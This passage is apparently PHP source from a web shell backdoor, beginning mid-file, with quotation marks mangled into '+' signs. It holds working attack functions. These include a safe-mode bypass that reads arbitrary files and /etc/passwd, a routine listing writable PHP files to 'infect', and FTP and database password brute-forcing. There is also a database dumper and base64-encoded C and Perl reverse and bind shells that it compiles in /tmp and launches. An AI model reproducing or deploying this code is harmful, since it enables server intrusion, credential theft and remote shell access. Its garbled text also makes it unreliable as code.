"; hardFooter(); } function actionSafeMode() { $temp=++; ob_start(); switch($_POST[+p1+]) { case 1: $temp=@tempnam($test, +cx+); if(@copy("compress.zlib://".$_POST[+p2+], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo +Sorry... Can+t open file+; break; case 2: $files = glob($_POST[+p2+].+*+); if( is_array($files) ) foreach ($files as $filename) echo $filename." "; break; case 3: $ch = curl_init("file://".$_POST[+p2+]."x00".SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST[+p2+]); break; case 5: for(;$_POST[+p2+] <= $_POST[+p3+];$_POST[+p2+]++) { $uid = @posix_getpwuid($_POST[+p2+]); if ($uid) echo join(+:+,$uid)." "; } break; case 6: if(!function_exists(+imap_open+))break; $stream = imap_open($_POST[+p2+], "", ""); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo +

Safe mode bypass

+; echo +Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From To


Imap_open (read file)
+; if($temp) echo +
+.$temp.+
+; echo +

+; hardFooter(); } function actionLogout() { setcookie(md5($_SERVER[+HTTP_HOST+]), ++, time() - 3600); die(+bye!+); } function actionSelfRemove() { if($_POST[+p1+] == +yes+) if(@unlink(preg_replace(+!(d+)s.*!+, ++, __FILE__))) die(+Shell has been removed+); else echo +unlink error!+; if($_POST[+p1+] != +yes+) hardHeader(); echo +

Suicide

Really want to remove the shell?
Yes

+; hardFooter(); } function actionInfect() { hardHeader(); echo +

Infect

+; if($_POST[+p1+] == +infect+) { $target=$_SERVER[+DOCUMENT_ROOT+]; function ListFiles($dir) { if($dh = opendir($dir)) { $files = Array(); $inner_files = Array(); while($file = readdir($dh)) { if($file != "." && $file != "..") { if(is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key=>$file){ $nFile = substr($file, -4, 4); if($nFile == ".php" ){ if(($file<>$_SERVER[+DOCUMENT_ROOT+].$_SERVER[+PHP_SELF+])&&(is_writeable($file))){ echo "$file
"; $i++; } } } echo "$i"; }else{ echo "
"; echo +Really want to infect the server? Yes

+; } hardFooter(); } function actionBruteforce() { hardHeader(); if( isset($_POST[+proto+]) ) { echo +

Results

Type: +.htmlspecialchars($_POST[+proto+]).+ Server: +.htmlspecialchars($_POST[+server+]).+
+; if( $_POST[+proto+] == +ftp+ ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST[+proto+] == +mysql+ ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.+:+.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST[+proto+] == +pgsql+ ) { function bruteForce($ip,$port,$login,$pass) { $str = "host=+".$ip."+ port=+".$port."+ user=+".$login."+ password=+".$pass."+ dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST[+server+]); if($_POST[+type+] == 1) { $temp = @file(+/etc/passwd+); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ++.htmlspecialchars($line[0]).+:+.htmlspecialchars($line[0]).+
+; } if(@$_POST[+reverse+]) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ++.htmlspecialchars($line[0]).+:+.htmlspecialchars($tmp); } } } } elseif($_POST[+type+] == 2) { $temp = @file($_POST[+dict+]); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST[+login+], $line) ) { $success++; echo ++.htmlspecialchars($_POST[+login+]).+:+.htmlspecialchars($line).+
+; } } } echo "Attempts: $attempts Success: $success


"; } echo +

FTP bruteforce

+ .++ .++ .++ .++ .++ .++ .+
Type + .++ .++ .++ .++ .+Server:port Brute type /etc/passwd   reverse (login -> nigol)   Dictionary   + .++ .++ .+
Login
Dictionary
+ .+
 
+; echo +

+; hardFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case +mysql+: if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case +pgsql+: $host = explode(+:+, $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case +mysql+: if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case +mysql+: return $this->res = @mysql_query($str); break; case +pgsql+: return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case +mysql+: return @mysql_fetch_assoc($res); break; case +pgsql+: return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case +mysql+: return $this->query("SHOW databases"); break; case +pgsql+: return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=+t+"); break; } return false; } function listTables() { switch($this->type) { case +mysql+: return $this->res = $this->query(+SHOW TABLES+); break; case +pgsql+: return $this->res = $this->query("select table_name from information_schema.tables where table_schema != +information_schema+ AND table_schema != +pg_catalog+"); break; } return false; } function error() { switch($this->type) { case +mysql+: return @mysql_error(); break; case +pgsql+: return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case +mysql+: if(function_exists(+mysql_set_charset+)) return @mysql_set_charset($str, $this->link); else $this->query(+SET CHARSET +.$str); break; case +pgsql+: return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case +mysql+: return $this->fetch($this->query("SELECT LOAD_FILE(+".addslashes($str)."+) as file")); break; case +pgsql+: $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM +".addslashes($str)."+;select file from hard2;"); $r=array(); while($i=$this->fetch()) $r[] = $i[+file+]; $this->query(+drop table hard2+); return array(+file+=>implode(" ",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case +mysql+: $res = $this->query(+SHOW CREATE TABLE `+.$table.+`+); $create = mysql_fetch_array($res); $sql = $create[1]."; "; if($fp) fwrite($fp, $sql); else echo($sql); $this->query(+SELECT * FROM `+.$table.+`+); $i = 0; $head = true; while($? = $this->fetch()) { $sql = ++; if($i % 1000 == 0) { $head = true; $sql = "; "; } $columns = array(); foreach($? as $k=>$v) { if($v === null) $?[$k] = "NULL"; elseif(is_int($v)) $?[$k] = $v; else $?[$k] = "+".@mysql_real_escape_string($v)."+"; $columns[] = "`".$k."`"; } if($head) { $sql .= +INSERT INTO `+.$table.+` (+.implode(", ", $columns).") VALUES (".implode(", ", $?).+)+; $head = false; } else $sql .= " ,(".implode(", ", $?).+)+; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, "; "); else echo("; "); break; case +pgsql+: $this->query(+SELECT * FROM +.$table); while($? = $this->fetch()) { $columns = array(); foreach($? as $k=>$v) { $?[$k] = "+".addslashes($v)."+"; $columns[] = $k; } $sql = +INSERT INTO +.$table.+ (+.implode(", ", $columns).+) VALUES (+.implode(", ", $?).+);+." "; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST[+type+]); if((@$_POST[+p2+]==+download+) && (@$_POST[+p1+]!=+select+)) { $db->connect($_POST[+sql_host+], $_POST[+sql_login+], $_POST[+sql_pass+], $_POST[+sql_base+]); $db->selectdb($_POST[+sql_base+]); switch($_POST[+charset+]) { case "Windows-1251": $db->setCharset(+cp1251+); break; case "UTF-8": $db->setCharset(+utf8+); break; case "KOI8-R": $db->setCharset(+koi8r+); break; case "KOI8-U": $db->setCharset(+koi8u+); break; case "cp866": $db->setCharset(+cp866+); break; } if(empty($_POST[+file+])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST[+tbl+] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST[+file+], +w+)) { foreach($_POST[+tbl+] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST[+p2+]); } else die(+

+); } hardHeader(); echo "

Sql browser

Type Host Login Password Database  
"; $tmp = ""; if(isset($_POST[+sql_host+])){ if($db->connect($_POST[+sql_host+], $_POST[+sql_login+], $_POST[+sql_pass+], $_POST[+sql_base+])) { switch($_POST[+charset+]) { case "Windows-1251": $db->setCharset(+cp1251+); break; case "UTF-8": $db->setCharset(+utf8+); break; case "KOI8-R": $db->setCharset(+koi8r+); break; case "KOI8-U": $db->setCharset(+koi8u+); break; case "cp866": $db->setCharset(+cp866+); break; } $db->listDbs(); echo "+; } else echo $tmp; }else echo $tmp; echo " count the number of rows
"; if(isset($db) && $db->link){ echo "
"; if(!empty($_POST[+sql_base+])){ $db->selectdb($_POST[+sql_base+]); echo "
Tables:

"; $tbls_res = $db->listTables(); while($? = $db->fetch($tbls_res)) { list($key, $value) = each($?); if(!empty($_POST[+sql_count+])) $n = $db->fetch($db->query(+SELECT COUNT(*) as n FROM +.$value.++)); $value = htmlspecialchars($value); echo " ".$value."" . (empty($_POST[+sql_count+])?+ +:" ({$n[+n+]})") . "
"; } echo "
File path:
"; if(@$_POST[+p1+] == +select+) { $_POST[+p1+] = +query+; $_POST[+p3+] = $_POST[+p3+]?$_POST[+p3+]:1; $db->query(+SELECT COUNT(*) as n FROM + . $_POST[+p2+]); $num = $db->fetch(); $pages = ceil($num[+n+] / 30); echo " ".$_POST[+p2+]." ({$num[+n+]} records) Page # "; echo " of $pages"; if($_POST[+p3+] > 1) echo " < Prev"; if($_POST[+p3+] < $pages) echo " Next >"; $_POST[+p3+]--; if($_POST[+type+]==+pgsql+) $_POST[+p2+] = +SELECT * FROM +.$_POST[+p2+].+ LIMIT 30 OFFSET +.($_POST[+p3+]*30); else $_POST[+p2+] = +SELECT * FROM `+.$_POST[+p2+].+` LIMIT +.($_POST[+p3+]*30).+,30+; echo "

"; } if((@$_POST[+p1+] == +query+) && !empty($_POST[+p2+])) { $db->query(@$_POST[+p2+]); if($db->res !== false) { $title = false; echo ++; $line = 1; while($? = $db->fetch()) { if(!$title) { echo ++; foreach($? as $key => $value) echo ++; reset($?); $title=true; echo ++; $line = 2; } echo ++; $line = $line==1?2:1; foreach($? as $key => $value) { if($value == null) echo ++; else echo ++; } echo ++; } echo +
+.$key.+
null +.nl2br(htmlspecialchars($value)).+
+; } else { echo +
Error: +.htmlspecialchars($db->error()).+
+; } } echo "

"; echo ""; } echo "

"; if($_POST[+type+]==+mysql+) { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, +@+, `host`) = USER() AND `File_priv` = +y+"); if($db->fetch()) echo "
Load file
"; } if(@$_POST[+p1+] == +loadfile+) { $file = $db->loadFile($_POST[+p2+]); echo +
+.htmlspecialchars($file[+file+]).+
+; } } else { echo htmlspecialchars($db->error()); } echo +

+; hardFooter(); } function actionNetwork() { hardHeader(); $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "

Network tools

Bind port to /bin/sh
Port: Password: Using:
Back-connect to
Server: Port: Using:

"; if(isset($_POST[+p1+])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(+file_put_contents+); if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); @fclose($w); } } if($_POST[+p1+] == +bpc+) { cf("/tmp/bp.c",$bind_port_c); $? = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $? .= ex("/tmp/bp ".$_POST[+p2+]." ".$_POST[+p3+]." &"); echo "
$?".ex("ps aux | grep bp")."
"; } if($_POST[+p1+] == +bpp+) { cf("/tmp/bp.pl",$bind_port_p); $? = ex(which("perl")." /tmp/bp.pl ".$_POST[+p2+]." &"); echo "
$?".ex("ps aux | grep bp.pl")."
"; } if($_POST[+p1+] == +bcc+) { cf("/tmp/bc.c",$back_connect_c); $? = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $? .= ex("/tmp/bc ".$_POST[+p2+]." ".$_POST[+p3+]." &"); echo "
$?".ex("ps aux | grep bc")."
"; } if($_POST[+p1+] == +bcp+) { cf("/tmp/bc.pl",$back_connect_p); $? = ex(which("perl")." /tmp/bc.pl ".$_POST[+p2+]." ".$_POST[+p3+]." &"); echo "
$?".ex("ps aux | grep bc.pl")."
"; } } echo +

+; hardFooter(); } if( empty($_POST[+a+]) ) if(isset($?) && function_exists(+action+ . $?)) $_POST[+a+] = $?; else $_POST[+a+] = +FilesMan+; if( !empty($_POST[+a+]) && function_exists(+action+ . $_POST[+a+]) ) call_user_func(+action+ . $_POST[+a+]); ?>

TOP